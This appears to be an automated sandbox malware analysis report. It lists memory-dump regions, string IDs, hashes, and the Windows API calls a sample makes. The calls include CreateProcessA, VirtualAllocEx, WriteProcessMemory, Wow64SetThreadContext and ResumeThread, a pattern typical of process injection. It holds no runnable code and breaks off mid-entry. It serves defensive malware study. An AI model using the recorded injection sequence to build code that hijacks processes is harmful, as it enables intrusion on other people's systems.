                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 04@
                                                                                        • API String ID: 0-383553253
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_438000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: VVULSSfjoivMBiLiukOSh
                                                                                        • API String ID: 0-1605430045
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 7
                                                                                        • API String ID: 0-1790921346
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Offset: 00434000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_434000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Db@$|Z@$3@$3@
                                                                                        • API String ID: 0-333138915

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.7%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:265
                                                                                        Total number of Limit Nodes:10

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0100D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0100D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0100D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0100D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057F8D8E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 33a8f3ceac8ffbeba8d902b54b17f1590f248607176a7313be725f9a310747fb
                                                                                        • Instruction ID: f73b3b3b01a9c93bcc20e183e3f3a7b659f86f4929d056cb6ee6a908d57597bb
                                                                                        • Opcode Fuzzy Hash: 33a8f3ceac8ffbeba8d902b54b17f1590f248607176a7313be725f9a310747fb
                                                                                        • Instruction Fuzzy Hash: B9A17A71D00219CFEB14CF68C840BEEBBB2BF48304F1485AAE959A7350DB749985DF92

                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057F8D8E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: bb5201c4567244c051d067c4aa748fa1ead3421380be77b5c2c4d10a29ff415a
                                                                                        • Instruction ID: 721656be9b90f63c0af74990beeff0f9c721f2367c76b5ed2dd18753a114f673
                                                                                        • Opcode Fuzzy Hash: bb5201c4567244c051d067c4aa748fa1ead3421380be77b5c2c4d10a29ff415a
                                                                                        • Instruction Fuzzy Hash: DC917A71D00219CFEB14CF68C844BEDBBB2BF48304F1485AAE959A7350DB749985DF92

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 5070d992af1f756030fbc896dd0e39628c10b5aaa8b1faf6b4b39f8660b76eba
                                                                                        • Instruction ID: fbe18c59c08ddbee1260d4b8900a0e7dd19ffa8b9f98f9c65f91486effa7ae85
                                                                                        • Opcode Fuzzy Hash: 5070d992af1f756030fbc896dd0e39628c10b5aaa8b1faf6b4b39f8660b76eba
                                                                                        • Instruction Fuzzy Hash: 89714570A00B058FEB65DF6AD44579ABBF1FF88304F00896DE48AD7A90DB74E945CB90

                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: c7f226c86d7406d21fb1ea9d601bf427d7c8d55d7671d34513422044a61bffde
                                                                                        • Instruction ID: 8a4ee005a2b5e5711f390ac58fa4d9a3ad83f7d0cf08e94ad69779b97c3f3e39
                                                                                        • Opcode Fuzzy Hash: c7f226c86d7406d21fb1ea9d601bf427d7c8d55d7671d34513422044a61bffde
                                                                                        • Instruction Fuzzy Hash: D741EFB0C0071DCBDB25DFA9C884B9EBBF5BF49304F60806AD448AB255DB756986CF90

                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: cf08d484a8d0827594c13a84c934bd2d7134af9686d7e4fee154b595ee3baa69
                                                                                        • Instruction ID: 815d29c86611805c2c7ef3774953e0b09ee2cf849f93385fa5a6b214a427b6a6
                                                                                        • Opcode Fuzzy Hash: cf08d484a8d0827594c13a84c934bd2d7134af9686d7e4fee154b595ee3baa69
                                                                                        • Instruction Fuzzy Hash: 224101B0C00719CBDB25CFA9C884B8DBBF5BF49304F20806AD408AB255DB756946CF90

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 622f7f2c14aa0d9bec263f9ef213bb89e7032cd69de01a96aab180408ea00e4b
                                                                                        • Instruction ID: c410be598558fad7745d583d2a399266352969b2c7de944eea2f0f485b01eff7
                                                                                        • Opcode Fuzzy Hash: 622f7f2c14aa0d9bec263f9ef213bb89e7032cd69de01a96aab180408ea00e4b
                                                                                        • Instruction Fuzzy Hash: CC3178B1D002489FDF10DFA9C8457EEBBF4EF88310F10846AD919A7351DB389941CBA2

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057F8960
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 73689e0e41756e278af12caba374e8824fdd99bef8b1ea9ca82669c63d3afb8d
                                                                                        • Instruction ID: 21da45c8f867278cd593a890c68e512790297edbe3bbb33533141f9c253a47af
                                                                                        • Opcode Fuzzy Hash: 73689e0e41756e278af12caba374e8824fdd99bef8b1ea9ca82669c63d3afb8d
                                                                                        • Instruction Fuzzy Hash: 332133B59003499FCF10CFAAC885BEEBBF5FF48310F10842AE919A7250C7789940DBA1

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057F8960
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 2d370b5bfd8e768cfbd0d6d621db50f12a7f0910fc9b558c3f6a3a042164c85f
                                                                                        • Instruction ID: 40ff0d0546552c481709df17a914762d1f1d23559ffbade762590edd078fd3c3
                                                                                        • Opcode Fuzzy Hash: 2d370b5bfd8e768cfbd0d6d621db50f12a7f0910fc9b558c3f6a3a042164c85f
                                                                                        • Instruction Fuzzy Hash: DA2124B59003499FCB10DFAAC885BEEBBF5FF48310F10842AE959A7250C7789944DBA1

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 057F87B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 31ed23ab34a450137a12950817560fdd2545367015bd1579176a64ef9060fbe5
                                                                                        • Instruction ID: 1a0b714babcf4ac7936e8bd8ec8645e26fde3570c6a45405b4aebf6c1a99a766
                                                                                        • Opcode Fuzzy Hash: 31ed23ab34a450137a12950817560fdd2545367015bd1579176a64ef9060fbe5
                                                                                        • Instruction Fuzzy Hash: 8C2145B29002099FDB10DFAAC485BEEBBF4FF49320F54842AD519A7341CB789945CFA1
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: ded137dde918b7318757592ee04fd5496ab4c339f4f052aebadcd25d7add1224
                                                                                        • Instruction ID: b785cf464b84efcfc61a75610e142d545c6b7f12b1e8b1f32d23d3edd9249912
                                                                                        • Opcode Fuzzy Hash: ded137dde918b7318757592ee04fd5496ab4c339f4f052aebadcd25d7add1224
                                                                                        • Instruction Fuzzy Hash: 4121E4B59003489FDB10CFAAD985ADEBFF8FB48310F14841AE958A3350D378A954CFA5
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057F8A40
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 467e7695b3930f6684932c321f135d4177dd63bacc4a3b70cf34b1cff46f6da3
                                                                                        • Instruction ID: 643b9e31ac325911491119909667c55cf0fb0f6a8eaceb7e61350dcd4663757e
                                                                                        • Opcode Fuzzy Hash: 467e7695b3930f6684932c321f135d4177dd63bacc4a3b70cf34b1cff46f6da3
                                                                                        • Instruction Fuzzy Hash: DF2128B2C002499FCB10DFAAC881AEEFBF5FF48310F50842AE919A7250C7389544DBA5
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 057F87B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 6d193e78046353261d20cd4da1d0a062f100e8b01d2c5cf724111fd946f5eab4
                                                                                        • Instruction ID: 11a23c447dcf2f8cf3a14e310d15de35d4017ebe2fd1052932939344075a4d9d
                                                                                        • Opcode Fuzzy Hash: 6d193e78046353261d20cd4da1d0a062f100e8b01d2c5cf724111fd946f5eab4
                                                                                        • Instruction Fuzzy Hash: 912134B1D002098FDB10DFAAC4857EEBBF5EF89324F10842AD519A7340CB78A944CFA1
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057F8A40
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: b02e4e6b79be733b9b49baaf4a74c1206ed01c6006a00086ccc6e368d8c2e200
                                                                                        • Instruction ID: 5ce3d8d012265677239158bc101cce91b7846cd73b2cfbd50dda15fa20c1e28a
                                                                                        • Opcode Fuzzy Hash: b02e4e6b79be733b9b49baaf4a74c1206ed01c6006a00086ccc6e368d8c2e200
                                                                                        • Instruction Fuzzy Hash: CC21F5B1C002499FCB10DFAAC885AEEFBF5FF48310F50842AE519A7250D7799944DBA5
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 06d45faa61b700be8c6831557b051b1b129227c6714c1d057d159c83fae9569d
                                                                                        • Instruction ID: 86cefd1cf3cfd42b71281707222718025d838b0fc99e142b94964bed50a4587a
                                                                                        • Opcode Fuzzy Hash: 06d45faa61b700be8c6831557b051b1b129227c6714c1d057d159c83fae9569d
                                                                                        • Instruction Fuzzy Hash: BE21C2B59002489FDB10CFAAD984ADEBFF9FB48310F14841AE958A7350D378A954CFA5
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057F887E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 78736fd55922f501374fda934dd2cd90497f1947d4754a28c71f8fc5a51a2053
                                                                                        • Instruction ID: 08fd26105bf129355b7ca2a2b95330e2eb9a09c9168fda6ec2ea73a7dfac7a05
                                                                                        • Opcode Fuzzy Hash: 78736fd55922f501374fda934dd2cd90497f1947d4754a28c71f8fc5a51a2053
                                                                                        • Instruction Fuzzy Hash: 2F1159768002499FCF10DFAAC844AEEFBF5FF48320F148819E519A7250CB39A940CFA1
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057F887E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 4259133fd0ea9c521bac858edcee8d1fba6bb39f9d28980ce36bec78ea6c78b3
                                                                                        • Instruction ID: f46f3ace0c9609110af6a27bebf171f2aebfd8926569baaaf01f5a6432c06572
                                                                                        • Opcode Fuzzy Hash: 4259133fd0ea9c521bac858edcee8d1fba6bb39f9d28980ce36bec78ea6c78b3
                                                                                        • Instruction Fuzzy Hash: 2D1137718002499FCF10DFAAC844AEEBFF5FF48310F148419E519A7250C779A540CFA1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 3043c7d036efa1bf5c8f1d237c6facac7a9d3410e3d3e3e42bf781bce182849d
                                                                                        • Instruction ID: 21ad824bf10a05f15723f986f1efa1d6bcc250432f04ee1986550e18f0b5b2df
                                                                                        • Opcode Fuzzy Hash: 3043c7d036efa1bf5c8f1d237c6facac7a9d3410e3d3e3e42bf781bce182849d
                                                                                        • Instruction Fuzzy Hash: F11128B1D002488FCB10DFAAC4457EEFBF5EF88324F208419D519A7250CB79A544CBA5
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 3e8c8ae44537371c832cf64fb697a4aff091679ef2847c657c918a055671b021
                                                                                        • Instruction ID: cf8c43c78908958eb2f07319866d51eb4359b5e8cc4cc41ce97787e676cf8d8c
                                                                                        • Opcode Fuzzy Hash: 3e8c8ae44537371c832cf64fb697a4aff091679ef2847c657c918a055671b021
                                                                                        • Instruction Fuzzy Hash: 531110B6C002498FDB10DF9AC444ADEFBF4EF88314F10845AD558A7350C379A645CFA1
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 057FB91D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 0cb8e69cd6b60f4db7d9f41e22fe6810f24322fce1f8855b02addbc1e7b30158
                                                                                        • Instruction ID: 4e6aa6bd9d5ff321369e743d25a3275072acbbf40fa237a246fd7ee7213c6301
                                                                                        • Opcode Fuzzy Hash: 0cb8e69cd6b60f4db7d9f41e22fe6810f24322fce1f8855b02addbc1e7b30158
                                                                                        • Instruction Fuzzy Hash: DA11F5B58042499FCB10DF99D889BDEBBF8EB58320F10841AE918A7350C379A544CFA1
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 057FB91D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 606a63ef30ff9c5a27d07ed1f4238b802475d495a9baba027be64cb9eebba8f0
                                                                                        • Instruction ID: 86c151e89861c82650ebd5cc2d837750f0b8743b6e32feefcbf60f381df53da7
                                                                                        • Opcode Fuzzy Hash: 606a63ef30ff9c5a27d07ed1f4238b802475d495a9baba027be64cb9eebba8f0
                                                                                        • Instruction Fuzzy Hash: EC11CEB58042499FDB10DF9AD889BDEBBF8EB48320F10841AE559A7210C379A944CFA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4@$4@$4@$4@$4@$6$L@$L@$L@$L@$TX@$TX@$TX@$TX@$X@$d$t@$t@
                                                                                        • API String ID: 0-2882190007
                                                                                        • Opcode ID: 9aa9f25135e4b911913b7a07eca6c7fd18fbb16b067e7b24a688b09fb023502b
                                                                                        • Instruction ID: 1c52104b21123b49bafaf6bd962fd91106d0d4c4c1097a4f7a58cb8d9edd2ec6
                                                                                        • Opcode Fuzzy Hash: 9aa9f25135e4b911913b7a07eca6c7fd18fbb16b067e7b24a688b09fb023502b
                                                                                        • Instruction Fuzzy Hash: A8033BB6900219DFDB25DF90DD48BEEB7B8FB48301F0081E9E54AB6160EB745A89CF54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $y@$,t@$4Z@$8r@$D]@$LZ@$`t@$r$|Z@$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-1716365018
                                                                                        • Opcode ID: 94bc0d62b3ced20b64a233dae9f2a10486dede8fb286201ab7c85cd8d7652bfd
                                                                                        • Instruction ID: 02d8adc499fd58e5f26fc75ebfb6aa2703631529fd68e8aa7c94da017a16a4d2
                                                                                        • Opcode Fuzzy Hash: 94bc0d62b3ced20b64a233dae9f2a10486dede8fb286201ab7c85cd8d7652bfd
                                                                                        • Instruction Fuzzy Hash: BD822775900119DFDB24DF60DD88BEEB779FB48305F0081EAE50AA6260EB745B89CF58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (@$E$TX@$TX@$`7@$d$h@$t@$@
                                                                                        • API String ID: 0-658975200
                                                                                        • Opcode ID: 78c8e7ea3f6e302dd1a4a95a735a3bb121f3f424cd23f241ed9cc064416472ef
                                                                                        • Instruction ID: ff3d3ff346b0417cf66589cb3514612c06a373764a037f2f6ab34170f2479345
                                                                                        • Opcode Fuzzy Hash: 78c8e7ea3f6e302dd1a4a95a735a3bb121f3f424cd23f241ed9cc064416472ef
                                                                                        • Instruction Fuzzy Hash: 06C22AB5900219DFDB24DFA0DD48BDEB7B4BB48304F0081EAE54AA7261DB745A89CF54
                                                                                        Strings
                                                                                        Memory Dump Source
